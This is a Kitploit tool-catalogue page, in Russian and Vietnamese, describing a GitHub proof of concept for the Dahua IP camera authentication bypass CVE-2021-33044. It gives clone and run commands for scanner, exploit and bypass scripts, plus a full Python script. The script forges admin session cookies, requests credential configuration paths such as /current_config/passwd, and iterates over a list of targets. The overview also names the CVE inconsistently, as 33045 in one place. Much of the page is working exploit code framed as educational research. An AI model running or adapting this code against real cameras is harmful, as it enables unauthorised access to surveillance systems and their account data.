Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
DAHUA_AUTH-BYPASS-CVE-2021-33044 — Camera Dahua Research lỗ hổng CVE-2021-33044 | Kitploit
Инструменты/GitHubGitHub/eagle-nett/dahua_auth-bypass-cve-2021-33044
Authentication & AuthorizationIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubeagle-nett/dahua_auth-bypass-cve-2021-33044

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

DAHUA_AUTH-BYPASS-CVE-2021-33044

Camera Dahua Research lỗ hổng CVE-2021-33044

Репозиторий
14 месяцев назадЕщё не проверено

Симуляция эксплуатации Dahua Authentication Bypass PoC (CVE-2021-33044)

Обзор

IP-камеры Dahua — это IoT-устройства, широко используемые в системах видеонаблюдения. Поскольку они часто развертываются в локальных сетях или имеют доступ из Интернета, уязвимости в IP-камерах могут серьезно повлиять на конфиденциальность и безопасность информации.

CVE-2021-33045 — это уязвимость безопасности, существующая в некоторых моделях камер Dahua, позволяющая несанкционированный доступ к внутренним конфигурационным ресурсам без надлежащей аутентификации. Эта уязвимость связана с недостаточно строгим контролем доступа в прошивке устройства.

Информация об уязвимости

ПунктСодержание
CVECVE-2021-33044
ТипAuthentication Bypass
СтепеньCritical (CVSS ~9.8)
АутентификацияНе требуется
ВлияниеDahua Camera / DVR / NVR

Причина

Уязвимость возникает из-за небезопасной конструкции аутентификации в прошивке камер Dahua:

  • Сервер не проверяет корректно session/token
  • Доверяет данным, отправленным клиентом
  • Некоторые чувствительные конфигурационные endpoints проверяют только наличие cookie, не проверяя реальные права доступа

Это позволяет атакующему:

  • подделать процесс аутентификации
  • полностью обойти вход в систему

Ссылки:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

Принцип работы механизма обхода аутентификации

Нормальный поток

root@kitploit:~
→ Client gửi HTTP request kèm cookie tùy ý
→ Camera kiểm tra cookie ở mức giao diện
→ Không xác minh session hợp lệ ở backend
→ Cho phép truy cập trực tiếp vào các endpoint cấu hình nội bộ
→ Trả về dữ liệu nhạy cảm

Сценарии

Файл

Использование

Установка

root@kitploit:~
# Clone repository
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

Сканирование сети

root@kitploit:~
# Scan subnet (ports required)
python dahua_scanner.py https://example.com -p 80 8080 8800

# Single host with port
python dahua_scanner.py https://example.com

Стандартные порты Dahua: 80,443, 8080, 37777, 37778

Эксплуатация уязвимости CVE

root@kitploit:~
python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

Обход аутентификации

root@kitploit:~
python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # Dump thiết bị sau khi bypass

Пример

root@kitploit:~
#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

Объяснение

  • Скрипт использует библиотеку requests и активно отключает предупреждения SSL для подавления предупреждений.

  • Функция dump_accounts(ip, port=80) является основной функцией, отвечающей за проверку одного устройства камеры. Основные функции функции:

    • Построить URL из IP-адреса и порта
    • Имитировать состояние входа администратора через cookie
    • Отправить запросы к чувствительным конфигурационным endpoint'ам
    • Проанализировать ответ, чтобы определить, уязвимо ли устройство
  • Имитация cookie аутентификации. Функция использует значения cookie, например:

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • В уязвимых версиях камер бэкенд не проверяет фактический sessionID, в результате чего система считает, что запрос отправлен от действительной учетной записи администратора.

Цикл обработки списка целей

Скрипт читает список целей из входного файла, последовательно вызывая функцию проверки для каждого устройства. Такой подход позволяет автоматически оценивать множество камер.

image

Процесс разработки

Эти скрипты разработаны на основе:

  • Детали CVE, опубликованные NVD
  • Уведомления безопасности от Dahua
  • Публичные PoC-ссылки (seclists.org, packetstormsecurity)

Статус тестирования:

  • Логика обхода аутентификации реализована в соответствии со спецификацией CVE
  • Ограниченное тестирование на уязвимых устройствах.

Примечание

Этот проект:

  • Только для учебных и исследовательских целей
  • Запускайте в своей лабораторной среде
Скачать инструмент
Назначение
CVE
dahua_scanner.pyОбнаружение сети — поиск камер Dahua в подсетиОбнаружение
dahua_exploit.pyМного-CVE сканер — проверка всех уязвимостей.Все
dahua_auth_bypass.pyСпециализированный обход аутентификации с опцией --dumpCVE-2021-33044